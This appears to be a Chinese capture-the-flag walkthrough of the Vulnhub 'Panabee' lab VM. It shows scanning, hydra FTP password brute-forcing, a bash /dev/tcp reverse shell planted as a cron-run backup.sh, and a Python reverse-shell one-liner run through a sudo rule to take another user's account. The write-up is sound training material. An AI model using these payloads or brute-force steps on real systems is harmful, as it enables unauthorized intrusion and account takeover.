Vulnhub之Panabee靶机详细测试过程 |
您所在的位置:网站首页 › commonname › Vulnhub之Panabee靶机详细测试过程 |
|
Panabee
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:cd:98:c4 1 60 PCS Systemtechnik GmbH
192.168.56.228 08:00:27:2b:99:a3 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.228 NMAP扫描 ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scan Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-22 23:21 EDT Nmap scan report for bogon (192.168.56.228) Host is up (0.00011s latency). Not shown: 65529 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 dc:e1:e6:86:ba:cd:4c:1c:e8:92:c4:02:90:64:d8:ba (RSA) | 256 00:72:c6:61:0e:34:1b:1a:b4:6c:f8:fc:b3:25:7b:6c (ECDSA) |_ 256 16:24:5b:97:20:ad:7d:ec:c4:fc:19:a5:3d:3c:cc:13 (ED25519) 25/tcp open smtp Postfix smtpd | ssl-cert: Subject: commonName=panabee | Subject Alternative Name: DNS:panabee | Not valid before: 2020-06-14T18:25:48 |_Not valid after: 2030-06-12T18:25:48 |_ssl-date: TLS randomness does not represent time |_smtp-commands: panabee, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 MAC Address: 08:00:27:2B:99:A3 (Oracle VirtualBox virtual NIC) Service Info: Host: panabee; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: 7h59m58s |_nbstat: NetBIOS name: PANABEE, NetBIOS user: , NetBIOS MAC: (unknown) | smb2-time: | date: 2023-03-23T11:21:52 |_ start_date: N/A | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.16 seconds 获得Shell ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ smbclient //192.168.56.228/note Password for [WORKGROUP\kali]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Jun 14 23:08:42 2020 .. D 0 Mon Jun 15 04:59:44 2020 note.txt N 265 Sun Jun 14 23:08:42 2020 20508240 blocks of size 1024. 12823536 blocks available smb: \> get note.txt getting file \note.txt of size 265 as note.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec) smb: \> put test.txt putting file test.txt as \test.txt (2.3 kb/s) (average 2.3 kb/s) smb: \> ls -alh NT_STATUS_NO_SUCH_FILE listing \-alh smb: \> ls . D 0 Thu Mar 23 07:23:20 2023 .. D 0 Mon Jun 15 04:59:44 2020 test.txt A 12 Thu Mar 23 07:23:20 2023 note.txt N 265 Sun Jun 14 23:08:42 2020 20508240 blocks of size 1024. 12823528 blocks available可以通过SMB上传文件 ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ cat note.txt Dear goper, I'll just leave it here as a note, Sorry for the late response, The server will now `backup` you files in your home dir, go ahead and backup anything you like, server will do it for you. Please delete this note once you've read for security measuregoper是用户名? 有计划任务在执行?(定期备份文件) ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ nikto -h http://192.168.56.228 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.56.228 + Target Hostname: 192.168.56.228 + Target Port: 80 + Start Time: 2023-03-22 23:25:23 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.41 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a81bc478475f, mtime: gzip + Allowed HTTP Methods: HEAD, GET, POST, OPTIONS + 7915 requests: 0 error(s) and 5 item(s) reported on remote host + End Time: 2023-03-22 23:25:52 (GMT-4) (29 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ********************************************************************* Portions of the server's headers (Apache/2.4.41) are not in the Nikto 2.1.6 database or are newer than the known string. Would you like to submit this information (*no server specific data*) to CIRT.net for a Nikto update (or you may email to [email protected]) (y/n)?目录扫描没有什么收获,接下来用hydra来破解密码 ──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ hydra -l goper -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.228 Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-22 23:38:08 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ftp://192.168.56.228:21/ [21][ftp] host: 192.168.56.228 login: goper password: spiderman 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-22 23:39:08 ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ ftp 192.168.56.228 Connected to 192.168.56.228. 220 (vsFTPd 3.0.3) Name (192.168.56.228:kali): goper 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -alh 229 Entering Extended Passive Mode (|||8003|) 150 Here comes the directory listing. drwxrwxr-x 4 1000 118 4096 Jun 21 2020 . drwxrwxr-x 4 1000 118 4096 Jun 21 2020 .. -rw------- 1 1000 1000 4591 Jun 21 2020 .bash_history -rw-r--r-- 1 1000 1000 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 1000 1000 3771 Feb 25 2020 .bashrc drwx------ 2 1000 1000 4096 Jun 14 2020 .cache drwxrwxr-x 3 1000 1000 4096 Jun 15 2020 .local -rw-r--r-- 1 1000 1000 807 Feb 25 2020 .profile -rw-rw-r-- 1 1000 1000 66 Jun 15 2020 .selected_editor -rw-r--r-- 1 1000 1000 0 Jun 14 2020 .sudo_as_admin_successful -rw------- 1 1000 1000 11134 Jun 15 2020 .viminfo -rw-r--r-- 1 0 1000 332 Jun 15 2020 status.py 226 Directory send OK. ftp> pwd Remote directory: / ftp> get status.py local: status.py remote: status.py 229 Entering Extended Passive Mode (|||59411|) 150 Opening BINARY mode data connection for status.py (332 bytes). 100% |*********************************************************************************| 332 2.25 KiB/s 00:00 ETA 226 Transfer complete. 332 bytes received in 00:00 (2.23 KiB/s) ftp> put test.txt local: test.txt remote: test.txt 229 Entering Extended Passive Mode (|||13323|) 150 Ok to send data. 100% |*********************************************************************************| 12 221.10 KiB/s 00:00 ETA 226 Transfer complete. 12 bytes sent in 00:00 (8.87 KiB/s) ftp>似乎在goper的家目录,因此可以将ssh公钥上传到目标主机 ──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/kali/.ssh/id_rsa): goper Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in goper Your public key has been saved in goper.pub The key fingerprint is: SHA256:3+QFgFMWB+8pvT4RzyAYwi8m6G0MyrXVJolWXxFpj4c kali@kali The key's randomart image is: +---[RSA 3072]----+ | . =Xo. | | .o += + | | .o +oo++ o | | o+.+o+oE.=oo | |.oo+ooo.S o.==. | |....+ . =.oo | | . . +. | | .. | | .. | +----[SHA256]-----+ ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ ls goper goper.pub nmap_full_scan note.txt status.py test.txt ftp> mkdir .ssh 257 "/.ssh" created ftp> cd .ssh 250 Directory successfully changed. ftp> put authorized_keys local: authorized_keys remote: authorized_keys 229 Entering Extended Passive Mode (|||34675|) 150 Ok to send data. 100% |*********************************************************************************| 563 16.77 MiB/s 00:00 ETA 226 Transfer complete. 563 bytes sent in 00:00 (0.98 MiB/s) ftp> ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ ssh -i goper [email protected] The authenticity of host '192.168.56.228 (192.168.56.228)' can't be established. ED25519 key fingerprint is SHA256:pA08zKKK15biAZhw/s1p7SqYmXtikdcPqTiWNiYSLwk. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.228' (ED25519) to the list of known hosts. [email protected]: Permission denied (publickey).但是目标并不允许基于私钥登录,这条路行不通 写一个bash脚本上传到ftp也就是goper的家目录,看能不能被自动执行 ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ cat shell.sh bash -i >& /dev/tcp/192.168.56.146/5555 0>&1这个bash脚本名称应该是backup.sh,才回cron执行 ftp> put backup.sh local: backup.sh remote: backup.sh 229 Entering Extended Passive Mode (|||10215|) 150 Ok to send data. 100% |*********************************************************************************| 57 869.75 KiB/s 00:00 ETA 226 Transfer complete. 57 bytes sent in 00:00 (45.43 KiB/s) ─$ sudo nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 45726 bash: cannot set terminal process group (3520): Inappropriate ioctl for device bash: no job control in this shell goper@panabee:~$ pwd pwd /home/goper goper@panabee:~$ ls -alh ls -alh total 72K drwxrwxr-x 5 goper ftp 4.0K Mar 23 11:57 . drwxr-xr-x 4 root root 4.0K Jun 15 2020 .. -rwx--x--x 1 goper goper 57 Mar 23 11:57 backup.sh -rw------- 1 goper goper 4.5K Jun 21 2020 .bash_history -rw-r--r-- 1 goper goper 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 goper goper 3.7K Feb 25 2020 .bashrc drwx------ 2 goper goper 4.0K Jun 14 2020 .cache drwxrwxr-x 3 goper goper 4.0K Jun 15 2020 .local -rw-r--r-- 1 goper goper 807 Feb 25 2020 .profile -rw-rw-r-- 1 goper goper 66 Jun 15 2020 .selected_editor -rw------- 1 goper goper 57 Mar 23 11:54 shell.sh drwx------ 2 goper goper 4.0K Mar 23 11:43 .ssh -rw-r--r-- 1 root goper 332 Jun 15 2020 status.py -rw-r--r-- 1 goper goper 0 Jun 14 2020 .sudo_as_admin_successful -rw------- 1 goper goper 12 Mar 23 11:40 test.txt -rw------- 1 goper goper 11K Jun 15 2020 .viminfo goper@panabee:~$ sudo -l sudo -l Matching Defaults entries for goper on panabee: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User goper may run the following commands on panabee: (jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py可以将原有的status.py删除,然后通过FTP上传反弹shell的python脚本,从而得到jenny的shell ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ vim status.py ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ cat status.py python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' goper@panabee:~$ rm -rf status.py rm -rf status.py ftp> put status.py local: status.py remote: status.py 229 Entering Extended Passive Mode (|||26655|) 150 Ok to send data. 100% |*********************************************************************************| 232 3.35 MiB/s 00:00 ETA 226 Transfer complete. 232 bytes sent in 00:00 (167.32 KiB/s) ftp> ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ cat status.py import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py sudo -u jenny /usr/bin/python3 /home/goper/status.py /usr/bin/python3: can't open file '/home/goper/status.py': [Errno 13] Permission denied goper@panabee:~$ chmod 777 status.py chmod 777 status.py goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py sudo -u jenny /usr/bin/python3 /home/goper/status.py ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee] └─$ sudo nc -nlvp 8888 listening on [any] 8888 ... connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 59108 $ id uid=1001(jenny) gid=1001(jenny) groups=1001(jenny) $ which python3 /usr/bin/python3 $ python3 -c 'import pty;pty.spawn("/bin/bash")' jenny@panabee:/home/goper$ cd /home cd /home jenny@panabee:/home$ ls -alh ls -alh total 16K drwxr-xr-x 4 root root 4.0K Jun 15 2020 . drwxr-xr-x 20 root root 4.0K Jun 15 2020 .. drwxrwxr-x 5 goper ftp 4.0K Mar 23 12:08 goper drwx------ 3 jenny jenny 4.0K Jun 15 2020 jenny jenny@panabee:/home$ cd jenny cd jenny jenny@panabee:~$ ls -alh ls -alh total 40K drwx------ 3 jenny jenny 4.0K Jun 15 2020 . drwxr-xr-x 4 root root 4.0K Jun 15 2020 .. -rw------- 1 jenny jenny 2.0K Jun 30 2020 .bash_history -rw-r--r-- 1 jenny jenny 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 jenny jenny 3.7K Feb 25 2020 .bashrc -rw------- 1 jenny jenny 32 Jun 15 2020 .lesshst -rw-r--r-- 1 jenny jenny 807 Feb 25 2020 .profile -rw-rw-r-- 1 jenny jenny 13 Jun 15 2020 status.txt -rw-r--r-- 1 root root 213 Jun 15 2020 thanks_jenny drwxrwxr-x 2 root jenny 4.0K Jun 30 2020 .tmux-0从.bash_history知道有个secret.zip文件,将其下载到Kali Linux本地 但是破解失败,本靶机的提权需要利用.tmux进行 提权 cd /root # ls -alh ls -alh total 80K drwx------ 5 root root 4.0K Jun 30 2020 . drwxr-xr-x 20 root root 4.0K Jun 15 2020 .. -rw------- 1 root root 18K Jun 30 2020 .bash_history -rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc drwx------ 2 root root 4.0K Jun 14 2020 .cache -rw------- 1 root root 38 Jun 30 2020 .lesshst drwxr-xr-x 3 root root 4.0K Jun 14 2020 .local -rw-r--r-- 1 root root 161 Dec 5 2019 .profile -rw-r--r-- 1 root root 239 Jun 15 2020 proof.txt -rw-r--r-- 1 root root 66 Jun 15 2020 .selected_editor drwx------ 2 root root 4.0K Jun 14 2020 .ssh -rw------- 1 root root 13K Jun 21 2020 .viminfo __ __ ___ ___ |__) /\ |\ | /\ |__) |__ |__ | /~~\ | \| /~~\ |__) |___ |___ |
今日新闻 |
推荐新闻 |
| CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |